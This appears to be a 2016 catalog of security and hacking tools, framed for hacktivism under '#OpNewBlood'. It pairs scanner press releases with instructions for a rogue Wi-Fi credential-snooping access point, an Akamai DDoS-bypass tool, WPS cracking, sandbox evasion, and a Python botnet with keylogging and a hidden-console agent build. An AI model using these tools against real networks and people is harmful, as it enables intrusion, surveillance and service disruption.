Tech Tools For Activism - Pentesting - Penetration Testing - Hacking - #OpNewBlood

TOOLS FOR PENTESTERS
2016 COMPILATION
0D1N - TOOL FOR AUTOMATING CUSTOMIZED ATTACKS

AGAINST WEB APPLICATIONS
Web security tool to make fuzzing at HTTP inputs, made in C

with libCurl.
You can do:
brute force passwords in auth forms

directory disclosure ( use PATH list to brute, and find
HTTP status code )
test list on input to find SQL Injection and XSS
vulnerabilities
To run:
require libcurl-dev or libcurl-devel(on rpm linux based)

$ git clone https://github.com/CoolerVoid/0d1n/
need libcurl to run

$ sudo apt-get install libcurl-dev
if rpm distro
$ sudo yum install libcurl-devel
$ make
$./0d1n
Download0d1n
3VILTWINATTACKER - CREATE ROGUE WI-FI ACCESS
POINT AND SNOOPING ON THE TRAFFIC
This tool create an rogue Wi-Fi access point , purporting to

provide wireless Internet services, but snooping on the traffic.
Software dependencies:
Recommended to use Kali linux.

Ettercap.
Sslstrip.
Airbase-ng include in aircrack-ng.
DHCP.
Nmap.
Install DHCP in Debian-based
Ubuntu
$ sudo apt-get install isc-dhcp-server
Kali linux
$ echo "deb http://ftp.de.debian.org/debian wheezy main "
>> /etc/apt/sources.list
$ apt-get update && apt-get install isc-dhcp-server
Install DHCP in redhat-based
Fedora
$ sudo yum install dhcp
Tools Options:
Etter.dns: Edit etter.dns to loading module dns spoof.

Dns Spoof: Start dns spoof attack in interface ath0 fake AP.
Ettercap: Start ettercap attack in host connected AP fake
Capturing login credentials.
Sslstrip: The sslstrip listen the traffic on port 10000.
Driftnet: The driftnet sniffs and decodes any JPEG TCP
sessions, then displays in an window.
Deauth Attack: kill all devices connected in AP (wireless

network) or the attacker can Also put the Mac-address in the
Client field, Then only one client disconnects the access point.
Probe Request: Probe request capture the clients trying to
connect to AP,Probe requests can be sent by anyone with a

legitimate Media Access Control (MAC) address, as association
to the network is not required at this stage.
Mac Changer: you can now easily spoof the MAC address.
With a few clicks, users will be able to change their MAC
addresses.
Device FingerPrint: list devices connected the network mini
fingerprint, is information collected about a local computing
device.
Video Demo
An error occurred.
Try watching this video on www.youtube.com, or enable JavaScript if it is
disabled in your browser.
Download 3vilTwinAttacker
ACUNETIX CLAMPS DOWN ON COSTLY WEBSITE
SECURITY WITH ONLINE SOLUTION
2nd March 2015 - London, UK - As cyber security continues to

hit the headlines, even smaller companies can expect to be
subject to scrutiny and therefore securing their website is more
important than ever. In response to this, Acunetix are offering
the online edition of their vulnerability scanner at a new lower
entry price. This new option allows consumers to opt for the
ability to scan just one target or website and is a further step in

making the top of the range scanner accessible to a wider
market.
A web vulnerability scanner allows the user to identify any
weaknesses in their website architecture which might aid a
hacker. They are then given the full details of the problem in
order to fix it. While the scanner might previously have been a
niche product used by penetration testers, security experts and
large corporations, in our current cyber security climate, such
products need to be made available to a wider market. Acunetix
have recognised this which is why both the product and its
pricing have become more flexible and tailored to multiple types
of user, with a one scan target option now available at $345.
Pricing for other options has also been reduced by around 15%
to reflect the current strength of the dollar. Use of the network
scanning element of the product is also currently being offered
completely free.
Acunetix CEO Nicholas Galea said: Due to recent attacks such
as the Sony hack and the Anthem Inc breach, companies are
under increasing pressure to ensure their websites and
networks are secure. Weve been continuously developing our
vulnerability scanner for a decade now, its a pioneer in the field
and continues to be the tool of choice for many security
experts. We feel its a tool which can benefit a far wider market
which is why we developed the more flexible and affordable
online version.
About Acunetix Vulnerability Scanner (Online version)
User-friendly and competitively priced, Acunetix Vulnerability

Scanner fully interprets and scans websites, including HTML5
and JavaScript and detects a large number of vulnerabilities,
including SQL Injection and Cross Site Scripting, eliminating
false positives. Acunetix beats competing products in many
areas; including speed, the strongest support of modern

technologies such as JavaScript, the lowest number of false
positives and the ability to access restricted areas with ease.
Acunetix also has the most advanced detection of WordPress
vulnerabilities and a wide range of reports including HIPAA and
PCI compliance.
Users can sign up for a trial of the online version of Acunetix
which includes the option to run free network scans.
ACUNETIX ONLINE VULNERABILITY SCANNER
Acunetix Online Vulnerability Scanner acts

officer for your company, scanning your
integrated web applications, web servers
perimeter servers for vulnerabilities. And
them before hackers exploit the weak
infrastructure!
as a virtual security
websites, including
and any additional
allowing you to fix
points in your IT
Leverages Acunetix leading web application scanner
Building on Acunetix advanced web scanning technology,
Acunetix OVS scans your website for vulnerabilities without

requiring to you to license, install and operate Acunetix Web
Vulnerability scanner. Acunetix OVS will deep scan your
website with its legendary crawling capability including full
HTML 5 support, and its unmatched SQL injection and Cross
Site Scripting finding capabilities.
Unlike other online security scanners, Acunetix is able to find a
much greater number of vulnerabilities because of its intelligent
analysis engine it can even detectDOM Cross-Site
Scriptingand BlindSQL Injectionvulnerabilities. And with a
minimum of false positives. Remember that in the world of web
scanning its not the number of different vulnerabilities that it
can find, its the depth with which it can check for vulnerabilities.
Each scanner can find one or more SQL injection
vulnerabilities, but few can find ALMOST ALL. Few scanners
are able to find all pages and analyze all content, leaving large
parts of your website unchecked. Acunetix will crawl the largest
number of pages and analyze all content.
Utilizes OpenVAS for cutting edge network security scanning
And Acunetix OVS does not stop at web vulnerabilities.

Recognizing the need to scan at network level and wanting to
offer best of breed technology only, Acunetix has partnered
with OpenVAS the leading network security
scanner.OpenVAShas been in development for more then 10
years and is backed by renowned security developers
Greenbone. OpenVAS draws on a vulnerability database of
thousands of network level vulnerabilities. Importantly,
OpenVAS vulnerability databases are always up to date,
boasting an average response rate of less than 24 hours for
updating and deploying vulnerability signatures to scanners.
Start your scan today
Getting Acunetix on your side is easy sign up in minutes,

install the site verification code and your scan will commence.
Scanning can take several hours, depending on the amount of
pages and the complexity of the content. After completion, scan
reports are emailed to you and Acunetix Security Consultants
are on standby to explain the results and help you action
remediation. For a limited time period, 2 full Network Scans are
included for FREE in the 14-day trial.
Acunetix Online Vulnerability Scanner

ACUNETIX V10 - WEB APPLICATION SECURITY TESTING
TOOL
Acunetix, the pioneer in automated web application security

software, has announced the release of version 10 of its
Vulnerability Scanner. New features are designed to prevent
the risk of hacking for all customers; from small businesses up
to large enterprises, including WordPress users, web
application developers and pen testers.
With the number of cyber-attacks drastically up in the last year
and the cost of breaches doubling, never has limiting this risk
been such a high priority and a cost-effective investment. The

2015 Information Security Breaches Survey from PWC found
90% of large organisations had suffered a breach and average
costs have escalated to over 3m per breach, at the higher
end.
The areas of a website which are most likely to be attacked and
are prone to vulnerabilities are those areas that require a user
to login. Therefore the latest version of Acunetix vastly
improves on its Login Sequence Recorder which can now
navigate multi-step authenticated areas automatically and with
ease. It crawls at lightning speed with its DeepScan crawling
engine now analyzing web applications developed using both
Java Frameworks and Ruby on Rails. Version 10 also improves
the automated scanning of RESTful and SOAP-based web
services and can now detect over 1200 vulnerabilities in
WordPress core and plugins.
Automated scanning of restricted areas
Latest automation functionality makes Acunetix not only even

easier to use, but gives better peace of mind through ensuring
the entire website is scanned. Restricted areas, especially user
login pages, make it more difficult for a scanner to access and
often required manual intervention. The Acunetix Login
Sequence Recorder overcomes this, having been significantly
improved to allow restricted areas to be scanned completely
automatically. This includes the ability to scan web applications
that use Single Sign-On (SSO) and OAuth-based
authentication. With the recorder following user actions rather
than HTTP requests, it drastically improves support for antiCSRF tokens, nonces or other one-time tokens, which are often
used in restricted areas.
Top dog in WordPress vulnerability detection
With WordPress sites having exceeded 74 million in number, a

single vulnerability found in the WordPress core, or even in a
plugin, can be used to attack millions of individual sites. The
flexibility of being able to use externally developed plugins
leads to the development of even more vulnerabilities. Acunetix
v10 now tests for over 1200 WordPress-specific vulnerabilities,
based on the most frequently downloaded plugins, while still
retaining the ability to detect vulnerabilities in custom built
plugins. No other scanner on the market can detect as many
WordPress vulnerabilities.
Support for various development architectures and web services
Many enterprise-grade, mission critical applications are built

using Java Frameworks and Ruby on Rails. Version 10 has
been engineered to accurately crawl and scan web applications
built using these technologies. With the increase in HTML5
Single Page Applications and mobile applications, web services
have become a significant attack vector. The new version
improves support for SOAP-based web services with WSDL
and WCF descriptions as well as automated scanning of
RESTful web services using WADL definitions. Furthermore,
version 10, introduces dynamic crawl pre-seeding by
integrating with external, third-party tools including Fiddler,
Burp Suite and the Selenium IDE to enhance Business Logic
Testing and the workflow between Manual Testing and
Automation.
Detection of Malware and Phishing URLs
Acunetix WVS 10 will ship with a malware URL detection

service, which is used to analyse all the external links found
during a scan against a constantly updated database of
Malware and Phishing URLs. The Malware Detection Service
makes use of the Google and Yandex Safe Browsing
Database.
New in Acunetix Vulnerability Scanner v10
'Login Sequence Recorder' has been re-engineered from

the ground-up to allow restricted areas to be scanned
entirely automatically.
Now tests for over 1200 WordPress-specific vulnerabilities
in the WordPress core and plugins.
Acunetix WVS Crawl data can be augmented using the
output of: Fiddler .saz files, Burp Suite saved items, Burp
Suite state files, HTTP Archive (.har) files, Acunetix HTTP
Sniffer logs, Selenium IDE Scripts.
Improved support for Java Frameworks (Java Server
Faces [JSF], Spring and Struts) and Ruby on Rails.
Increased web services support for web applications
which make use of WSDL based web-services, Microsoft
WCF-based web services and RESTful web services.
Ships with a malware URL detection service, which is
used to analyse all the external links found during a scan
against a constantly updated database of Malware and
Phishing URLs.
DownloadAcunetix Web Vulnerability Scanner

Version 10
AIRCRACK-NG 1.2 RC 2 - WEP AND WPA-PSK KEYS
CRACKING PROGRAM
Here is the second release candidate. Along with a LOT of

fixes, it improves the support for the Airodump-ng scan
visualizer. Airmon-zc is mature and is now renamed to Airmonng. Also, Airtun-ng is now able to encrypt and decrypt WPA on
top of WEP. Another big change is recent version of GPSd now
work very well with Airodump-ng.
Aircrack-ng is an 802.11 WEP and WPA-PSK keys cracking
program that can recover keys once enough data packets have
been captured. It implements the standard FMS attack along
with some optimizations like KoreK attacks, as well as the allnew PTW attack, thus making the attack much faster compared
to other WEP cracking tools. In fact, Aircrack-ng is a set of tools
for auditing wireless networks.
Aircrack-ng is the next generation of aircrack with lots of new

features:
Better documentation (wiki, manpages) and support
(Forum, trac, IRC: #aircrack-ng on Freenode).
More cards/drivers supported
More OS and platforms supported
PTW attack
WEP dictionary attack
Fragmentation attack
WPA Migration mode
Improved cracking speed
Capture with multiple cards
New tools: airtun-ng, packetforge-ng (improved arpforge),

wesside-ng, easside-ng, airserv-ng, airolib-ng, airdriverng, airbase-ng, tkiptun-ng and airdecloak-ng
Optimizations, other improvements and bug fixing
DownloadAircrack-ng 1.2 RC 2
AIRCRACK-NG 1.2 RC 3 - WEP AND WPA-PSK KEYS
CRACKING PROGRAM
Aircrack-ng is an 802.11 WEP and WPA-PSK keys cracking

program that can recover keys once enough data packets have
been captured. It implements the standard FMS attack along
with some optimizations like KoreK attacks, as well as the PTW
attack, thus making the attack much faster compared to other
WEP cracking tools.
Third release candidate and hopefully this should be the last
one. It contains a ton of bug fixes, code cleanup, improvements
and compilation fixes everywhere. Some features were added:
AppArmor profiles, better FreeBSD support, including an
airmon-ng for FreeBSD.
AIRCRACK-NG CHANGELOG
Version 1.2-rc3 (changes from aircrack-ng 1.2-rc2) Released 21 Nov 2015:
Airodump-ng: Prevent sending signal to init which caused

the system to reboot/shutdown.
Airbase-ng: Allow to use a user-specified ANonce instead

of a randomized one when doing the 4-way handshake
Aircrack-ng: Fixed compilation warnings.
Aircrack-ng: Removed redundant NULL check and fixed

typo in another one.
Aircrack-ng: Workaround for segfault when compiling

aircrack-ng with clang and gcrypt and running a check.
Airmon-ng: Created version for FreeBSD.
Airmon-ng: Prevent passing invalid values as channel.
Airmon-ng: Handle udev renaming interfaces.
Airmon-ng: Better handling of rfkill.
Airmon-ng: Updated OUI URL.
Airmon-ng: Fix VM detection.
Airmon-ng: Make lsusb optional if there doesn't seem to

be a usb bus. Improve pci detection slightly.
Airmon-ng: Various cleanup and fixes (including wording

and typos).
Airmon-ng: Display iw errors.
Airmon-ng: Improved handling of non-monitor interfaces.
Airmon-ng: Fixed error when running 'check kill'.
Airdrop-ng: Display error instead of stack trace.
Airmon-ng: Fixed bashism.
Airdecap-ng: Allow specifying output file names.
Airtun-ng: Added missing parameter to help screen.
Besside-ng-crawler: Removed reference to darkircop.org

(non-existent subdomain).
Airgraph-ng: Display error when no graph type is

specified.
Airgraph-ng: Fixed make install.
Manpages: Fixed, updated and improved airodump-ng,

airmon-ng, aircrack-ng, airbase-ng and aireplay-ng
manpages.
Aircrack-ng GUI: Fixes issues with wordlists selection.
OSdep:
Add
missing
RADIOTAP_SUPPORT_OVERRIDES check.
OSdep: Fix possible infinite loop.
OSdep: Use a default MTU of 1500 (Linux only).
OSdep: Fixed compilation on OSX.
AppArmor: Improved and added profiles.
General: Fixed warnings reported by clang.
General: Updated TravisCI configuration file
General: Fixed typos in various tools.
General: Fixed clang warning about 'gcry_thread_cbs()'

being deprecated with gcrypt > 1.6.0.
General: Fixed compilation on cygwin due to undefined

reference to GUID_DEVCLASS_NET
General: Fixed compilation with musl libc.
General: Improved testing and added test cases (make

check).
General: Improved mutexes handling in various tools.
General: Fixed memory leaks, use afer free, null

termination and return values in various tools and OSdep.
General: Fixed compilation on FreeBSD.
General: Various fixes and improvements to README

(wording, compilation, etc).
General: Updated copyrights in help screen.
DownloadAircrack-ng 1.2 RC 3
ANTICUCKOO - A TOOL TO DETECT AND CRASH
CUCKOO SANDBOX
A tool to detect and crash Cuckoo Sandbox. Tested in Cuckoo

Sandbox Official and Accuvant's Cuckoo version.
Features
Detection:
Cuckoo hooks detection (all kind of cuckoo hooks).
Suspicius data in own memory (without APIs, page
per page scanning).
Crash (Execute with arguments) (out of a sandbox
these args dont crash the program):
-c1: Modify the RET N instruction of a hooked API
with a higher value. Next call to API pushing more
args into stack. If the hooked API is called from the
Cuckoo's HookHandler the program crash because it

only pushes the real API args then the modified RET
N instruction corrupt the HookHandler's stack.
The overkill methods can be useful. For example using the
overkill methods you have two features in one: detection/crash
and "a kind of Sleep" (Cuckoomon bypass long Sleeps calls).
Cuckoo Detection
Submit Release/anticuckoo.exe to analysis in Cuckoo

Sandbox. Check the screenshots (console output). Also you
can check Accesed Files in Sumary:
Accesed Files in Sumary (django web):
Cuckoo Crash
Specify in submit options the crash argument, ex -c1 (via

django web):
And check Screenshots/connect via RDP/whatson

connection to verify the crash. Ex -c1 via RDP:
DownloadAntiCuckoo
APPCRASHVIEW - VIEW APPLICATION CRASHES (.WER
FILES)
AppCrashView is a small utility for Windows Vista and Windows

7 that displays the details of all application crashes occurred in
your system. The crashes information is extracted from the .wer
files created by the Windows Error Reporting (WER)
component of the operating system every time that a crash is
occurred. AppCrashView also allows you to easily save the
crashes list to text/csv/html/xml file.
System Requirements
For now, this utility only works on Windows Vista, Windows 7,

and Windows Server 2008, simply because the earlier versions
of Windows don't save the crash information into .wer files. It's
possible that in future versions, I'll also add support for
Windows XP/2000/2003 by using Dr. Watson (Drwtsn32.exe) or

other debug component that capture the crash information.
Using AppCrashView
AppCrashView doesn't require any installation process or

additional dll files. In order to start using it, simply run the
executable file - AppCrashView.exe The main window of
AppCrashView contains 2 pane. The upper pane displays the
list of all crashes found in your system, while the lower pane
displays the content of the crash file that you select in the upper
pane.
You can select one or more crashes in the upper pane, and
then save them (Ctrl+S) into text/html/xml/csv file or copy them
to the clipboard ,and paste them into Excel or other
spreadsheet application.
Command-Line Options
/
ProfilesFo
lder
<Folder>
Specifies the user profiles folder (e.g: c:

\users) to load. If this parameter is not
specified, the profiles folder of the current
operating system is used.
/
ReportsF
older
<Folder>
Specifies the folder that contains the WER

files you wish to load.
/
ShowRep
ortQueue
<0 | 1>
Specifies whether to enable the 'Show

ReportQueue Files' option. 1 = enable, 0 =
disable
/
ShowRep
ortArchive
<0 | 1>
Specifies whether to enable the 'Show

ReportArchive Files' option. 1 = enable, 0 =
disable
/stext
<Filenam
e>
Save the list of application crashes into a

regular text file.
/stab
<Filenam
e>
Save the list of application crashes into a tabdelimited text file.
/scomma
<Filenam
e>

comma-delimited text file (csv).
/stabular
<Filenam
e>

tabular text file.
/shtml
<Filenam
e>
Save the list of application crashes into HTML

file (Horizontal).
/sverhtml
<Filenam
e>
Save the list of application crashes into HTML

file (Vertical).
/sxml
<Filenam
e>
Save the list of application crashes into XML

file.
/sort
<column>
This command-line option can be used with

other save options for sorting by the desired
column. If you don't specify this option, the list
is sorted according to the last sort that you
made from the user interface. The <column>
parameter can specify the column index (0 for
the first column, 1 for the second column, and
so on) or the name of the column, like "Event
Name" and "Process File". You can specify
the '~' prefix character (e.g: "~Event Time") if
you want to sort in descending order. You can
put multiple /sort in the command-line if you
want to sort by multiple columns. Examples:
AppCrashView.exe /shtml "f:\temp
\crashlist.html" /sort 2 /sort ~1
AppCrashView.exe /shtml "f:\temp
\crashlist.html" /sort "Process File"
/nosort
When you specify this command-line option,

the list will be saved without any sorting.
DownloadAppCrashView
APPIE - ANDROID PENTESTING PORTABLE INTEGRATED
ENVIRONMENT
Appie is a software package that has been pre-configured to

function as an Android Pentesting Environment.It is completely
portable and can be carried on USB stick.This is a one stop
answer for all the tools needed in Android Application Security
Assessment.
Difference between Appie and existing environments ?
Tools contained in Appie are running on host machine
instead of running on virtual machine.
Less Space Needed(Only 600MB compared to atleast
8GB of Virual Machine)
As the name suggests it is completely Portable i.e it can
be carried on USB Stick or on your own smartphone
and your pentesting environment will go wherever you go
without any differences.
Awesome Interface
Which tools are included in Appie ?

Drozer
dex2jar
Androguard
Introspy-Analyzer
Jd-Gui
Android Debug Bridge
Apktool
Sublime Text
Androguard SublimeText Plugin
Eclipse with Android Developer Tools
Owasp GoatDroid Project Configured
Fastboot and sqlite3
Java Runtime Environment and Python Files.With these
you dont even need to have Python or Java Runtime
Environment installed on the computer.
Nearly all UNIX commands like ls, cat, chmod, cp, find, git,
unzip, mkdir, ssh, openssl, keytool ,jarsigner and many
others
DownloadAppie
APPUSE - ANDROID PENTEST PLATFORM UNIFIED
STANDALONE ENVIRONMENT
AppUse Virtual Machine, developed by AppSec Labs, is a

unique (and free) system, a platform for mobile application
security testing in the android environment, and it includes
unique custom-made tools.
Faster &MorePowerful
The system is a blessing to security teams, who from now on

can easily perform security tests on Android applications. It was
created as a virtual machine targeted for penetration testing
teams who are interested in a convenient, personalized
platform for android application security testing, for catching
security problems and analysis of the application traffic.
Now, in order to test Android applications, all you will need is to
download AppUse Virtual Machine, activate it, load your
application and test it.
Easy toUse
There is no need for installation of simulators and testing tools,

no need for SSL certificates of the proxy software, everything
comes straight out of the box pre-installed and configured for
an ideal user experience.
Security experts who have seen the machine were very
excited, calling it the next BackTrack (a famous system for
testing security problems), specifically adjusted for Android
application security testing.
AppUse VM closes gaps in the world of security, now there is a
special and customized testing environment for Android
applications; an environment like this has not been available
until today, certainly not with the rich format offered today by
AppUse VM.
This machine is intended for the daily use of security testers

everywhere for Android applications, and is a must-have tool
for any security person.
We at AppSec Labs do not stagnate, specifically at a time in
which so many cyber attacks take place, we consider it our duty
to assist the public and enable quick and effective security
testing.
As a part of AppSec Labs policy to promote application
security in general, and specifically mobile application security,
AppUse is offered as a free download on our website, in order
to share the knowledge, experience and investment with the
data security community.
Features
New Application Data Section

Tree-view of the applications folder/file structure
Ability to pull files
Ability to view files
Ability to edit files
Ability to extract databases
Dynamic proxy managed via the Dashboard
New application-reversing features
Updated ReFrameworker tool
Dynamic indicator for Android device status
Bugs and functionality fixes
DownloadAppUse
ARDT - AKAMAI REFLECTIVE DDOS TOOL
Akamai Reflective DDoS Tool
Attack the origin host behind the Akamai Edge hosts and
bypass the DDoS protection offered by Akamai services.
How it works...
Based off the research done at NCC: ( https://

dl.packetstormsecurity.net/papers/attack/
the_pentesters_guide_to_akamai.pdf )
Akamai boast around 100,000 edge nodes around the world
which offer load balancing, web application firewall, caching
etc, to ensure that a minimal amount of requests actually hit
your origin web-server beign protected. However, the issue with
caching is that you cannot cache something that is nondeterministic, I.E a search result. A search that has not been
requested before is likely not in the cache, and will result in a
Cache-Miss, and the Akamai edge node requesting the
resource from the origin server itself.
What this tool does is, provided a list of Akamai edge nodes
and a valid cache missing request, produces multiple requests
that hit the origin server via the Akamai edge nodes. As you
can imagine, if you had 50 IP addresses under your control,
sending requests at around 20 per second, with 100,000
Akamai edge node list, and a request which resulting in 10KB
hitting the origin, if my calculations are correct, thats around
976MB/ps hitting the origin server, which is a hell of a lot of
traffic.
Finding Akamai Edge Nodes
To find Akamai Edge Nodes, the following script has been

included:
# python ARDT_Akamai_EdgeNode_Finder.py
This can be edited quite easily to find more, it then saves the
IPS automatically.
Download ARDT
ARES - PYTHON BOTNET AND BACKDOOR
Ares is made of two main programs:

A Command aNd Control server, which is a Web interface
to administer the agents
An agent program, which is run on the compromised host,
and ensures communication with the CNC
The Web interface can be run on any server running Python.
You need to install the cherrypy package.
The client is a Python program meant to be compiled as a
win32 executable using pyinstaller. It depends on the requests,
pythoncom, pyhook python modules and on PIL (Python
Imaging Library).
It currently supports:
remote cmd.exe shell
persistence
file upload/download
screenshot
key logging
INSTALLATION
SERVER
To install the server, first create the sqlite database:

cd server/
python db_init.py
If no installed, install the cherrypy python package.
Then launch the server by issuing: python server.py
By default, the server listens on http://localhost:8080
AGENT
The agent can be launched as a python script, but it is

ultimately meant to be compiled as a win32 executable using
pyinstaller.
First, install all the dependencies:
requests
pythoncom
pyhook
PIL
Then, configure agent/settings.py according to your needs:
SERVER_URL = URL of the CNC http server
BOT_ID = the (unique) name of the bot, leave empty to use
hostname
DEBUG = should debug messages be printed to stdout ?
IDLE_TIME = time of inactivity before going in idle mode (the
agent checks the CNC for commands far less often when idle).
REQUEST_INTERVAL = interval between each query to the
CNC when active
Finally, use pyinstaller to compile the agent into a single exe
file:
cd client/
pyinstaller --onefile --noconsole agent.py
Download Ares
ASHTTP - SHELL COMMAND TO EXPOSE ANY OTHER

COMMAND AS HTTP
ashttp provide a simple way to expose any shell command by

HTTP. For example, to expose top by HTTP, try : ashttp -p8080
top ; then try http://localhost:8080.
Dependencies
ashttp depends on hl_vt100, a headless VT100 emulator.

To get and compile hl_vt100 :
$ git clone https://github.com/JulienPalard/vt100-
emulator.git
$ aptitude install python-dev
$ make python_module
$ python setup.py install
Usage
ashttp can serve any text application over HTTP, like :

$ ashttp -p 8080 top
to serve a top on port 8080

$ ashttp -p 8080 watch -n 1 ls -lah /tmp
to serve an actualized directory listing of /tmp
DownloadAsHttp
ATSCAN - SERVER, SITE AND DORK SCANNER
DESCRIPTION:
ATSCAN Version 2
Dork scanner.
XSS scanner.
Sqlmap.
LFI scanner.
Filter wordpress and Joomla sites in the server.
Find Admin page.
Decode / Encode MD5 + Base64.
LIBRERIES TO INSTALL:
ap-get install libxml-simple-perl
NOTE: Works in linux platforms.

PERMISSIONS & EXECUTUTION:
$chmod +x atscan.pl
perl ./atscan.pl
SCREENSHOTS:
Download ATSCAN
AUTOBROWSER - CREATE REPORT AND SCREENSHOTS
OF HTTP/S BASED PORTS ON THE NETWORK
AutoBrowser is a tool written in python for penetration testers.
The purpose of this tool is to create report and screenshots of
http/s based ports on the network. It analyze Nmap Report or
scan with Nmap, Check the results with http/s request on each
host using headless web browser, Grab a screenshot of the
response page content.
This tool is designed for IT professionals to perform
penetration testing to scan and analyze NMAP results.
Proof of concept video (From version: 2.0)
An error occurred.
Examples
Delimiting the values on the CLI arguments it must be by

double quotes only!
Get the argument details of scan method: python
AutoBrowser.py scan --help
Scan with Nmap and Checks the results and create folder
by name project_name: python AutoBrowser.py scan
"192.168.1.1/24" -a="-sT -sV -T3" -p project_name
Get the argument details of analyze method: python
AutoBrowser.py analyze --help
Analyzing Nmap XML report and create folder by name

report_analyze: python AutoBrowser.py analyze
nmap_file.xml --project report_analyze
Requirements:
Linux Installation:
1. sudo apt-get install python-pip python2.7-dev libxext-dev
python-qt4 qt4-dev-tools build-essential nmap
2. sudo pip install -r requirements.txt
MacOSx Installation:
1. Install Xcode Command Line Tools (AppStore)
2. ruby -e "$(curl -fsSL https://raw.github.com/
mxcl/homebrew/go)"
3. brew install pyqt nmap

4. sudo easy_install pip
Windows Installation:
1. Install setuptools
2. Install pip
3. Install PyQt4
4. install Nmap
5. Open Command Prompt(cmd) as Administrator -> Goto
python folder -> Scripts (cd c:\Python27\Scripts)
6. pip install -r (Full Path To requirements.txt)
Download AutoBrowser
AUTOREAVER - MUTLIPLE ACCESS POINT TARGETS
ATTACK USING REAVER
AutoReaveris bash script which provides multiple access point
attack using reaver and BSSIDs list from a text file.
If processed AP reaches rate limit, script goes to another from
the list, and so forth.
HOW IT WORKS ?
Script takes AP targets list from text file in following format

BSSID CHANNEL ESSID
For example:
AA:BB:CC:DD:EE:FF 1 MyWlan
00:BB:CC:DD:EE:FF 13 TpLink
00:22:33:DD:EE:FF 13 MyHomeSSID
And then following steps are being processed:

Every line of list file is checked separately in for loop
After every AP on the list once, script automatically
changes MAC address of your card to random MAC using
macchanger (you can also setup your own MAC if you
need),
Whole list is checked again and again, in endless while
loop, until there is nothing to check loop is stopped,

Found PINS/WPA PASSPHRASES are stored in
{CRACKED_LIST_FILE_PATH} file.
REQUIREMENTS
Wireless adapter which supports injection (see [https://

code.google.com/p/reaver-wps/wiki/
SupportedWirelessDrivers Reaver Wiki])
Linux Backtrack 5
Root access on your system (otherwise some things may
not work)
AND if you use other Linux distribution*
Reaver 1.4 (I didn't try it with previous versions)
KDE (unless you'll change 'konsole' invocations to
'screen', 'gnome-terminal' or something like that...
this is easy)
Gawk (Gnu AWK)
Macchanger
Airmon-ng, Airodump-ng, Aireplay-ng
Wash (WPS Service Scanner)
Perl
USAGE EXAMPLE
First you have to download lastest version

git clone https://code.google.com/p/auto-reaver/
Go to auto-reaver directory
cd ./auto-reaver
Make sure that scripts have x permissions for your user, if not
run
chmod 700 ./washAutoReaver
chmod 700 ./autoReaver
Run wash scanner to make a formatted list of Access Points

with WPS service enabled
./washAutoReaverList > myAPTargets
Wait for 1-2 minutes for wash to collect APs, and hit CTRL+C
to kill the script. Check if any APs were detected

cat ./myAPTargets
If there are targets in myAPTargets file, you can proceed

attack, with following command:
./autoReaver myAPTargets
ADDITIONAL FEATURES
Script logs dates of PIN attempts, so you can check how

often AP is locked and for how long. Default directory for
those logs is ReaverLastPinDates.
Script logs each AP rate limit for every AP (default
directory is /tmp/APLimitBSSID), so you can easily check
when last rate limit occured
You can setup your attack using variables from
configurationSettings file (sleep/wait times between AP`s
and loops, etc.)
You can disable checking AP by adding "#" sign in the
beginning of line, in myAPTargets file (then AP will be
ommited in loop)
(added 2014-07-03) You can setup specific settings per
access point.
To do that for AP with MAC AA:BB:CC:DD:EE:FF, just
create file ./configurationSettingsPerAp/AABBCCDDEEFF
and put there variables from ./configurationSettings file
that you want to change for example:
ADDITIONAL_OPTIONS="-g 10 -E -S -N -T 1 -t 15 -d 0 -x
3";
so AA:BB:CC:DD:EE:FF will have only

ADDITIONAL_OPTIONS changed (rest of variables from ./
configurationSettings file remains unchanged).
You can define channel as random by setting it's value (in
myAPTargets file) to R, you can force script to automatically
find AP channel.
Example:
AA:BB:CC:DD:EE:FF R MyWlan
But remember that you probably should also increase value of

BSSID_ONLINE_TIMEOUT variable - since hopping between all
channels takes much more time than searching on one
channel.
DownloadAutoReaver
AUTORIZE - AUTOMATIC AUTHORIZATION
ENFORCEMENT DETECTION (EXTENSION FOR BURP
SUITE)
Autorize is an automatic authorization enforcement detection

extension for Burp Suite. It was written in Python by Barak
Tawily, an application security expert at AppSec Labs. Autorize
was designed to help security testers by performing automatic
authorization tests.
Installation
1. Download Burp Suite (obviously): http://portswigger.net/

burp/download.html
2. Download Jython standalone JAR: http://www.jython.org/
downloads.html
3. Open burp -> Extender -> Options -> Python Environment
-> Select File -> Choose the Jython standalone JAR
4. Install Autorize from the BApp Store or follow these steps:
5. Download the Autorize.py file.
6. Open Burp -> Extender -> Extensions -> Add -> Choose
Autorize.py file.
7. See the Autorize tab and enjoy automatic authorization
detection :)
User Guide - How to use?
1. After installation, the Autorize tab will be added to Burp.

2. Open the configuration tab (Autorize -> Configuration).
3. Get your low-privileged user authorization token header
(Cookie / Authorization) and copy it into the textbox
containing the text "Insert injected header here".
4. Click on "Intercept is off" to start intercepting the traffic in
order to allow Autorize to check for authorization
enforcement.
5. Open a browser and configure the proxy settings so the
traffic will be passed to Burp.
6. Browse to the application you want to test with a high
privileged user.
7. The Autorize table will show you the request's URL and
enforcement status.
8. It is possible to click on a specific URL and see the
original/modified request/response in order to investigate
the differences.
Authorization Enforcement Status
There are 3 enforcement statuses:
1. Authorization bypass! - Red color

2. Authorization enforced! - Green color
3. Authorization enforced??? (please configure enforcement
detector) - Yellow color
The first 2 statuses are clear, so I wont elaborate on them.
The 3rd status means that Autorize cannot determine if
authorization is enforced or not, and so Autorize will ask you to
configure a filter in the enforcement detector tab.
The enforcement detector filters will allow Autorize to detect
authorization enforcement by fingerprint (string in the message
body) or content-length in the server's response.
For example, if there is a request enforcement status that is
detected as "Authorization enforced??? (please configure
enforcement detector)" it is possible to investigate the modified/
original response and see that the modified response body
includes the string "You are not authorized to perform action",
so you can add a filter with the fingerprint value "You are not
authorized to perform action", so Autorize will look for this
fingerprint and will automatically detect that authorization is
enforced. It is possible to do the same by defining contentlength filter.
DownloadAutorize
AVCAESAR - MALWARE ANALYSIS ENGINE AND
REPOSITORY
AVCaesar is a malware analysis engine and repository,

developed by malware.lu within the FP7 project CockpitCI.
Functionalities
AVCaesar can be used to:

Perform an efficient malware analysis of suspicious files
based on the results of a set of antivirus solutions,
bundled together to reach the highest possible probability
to detect potential malware;
Search for malware samples in a progressively increasing
malware repository.
The basic functionalities can be extended by:
Download malware samples (15 samples/day for
registered users and 100 samples/day for premium users);
Perform confidential malware analysis (reserved to
premium users)
Malware analysis process
The malware analysis process is kept as easy and intuitive as

possible for AVCaesar users:
Submit suspicious file via AVCaesar web interface.
Premium users can choose to perform a confidential
analysis.
Receive a well-structured malware analysis report.
AVCaesar - Malware Analysis Engine and

Repository
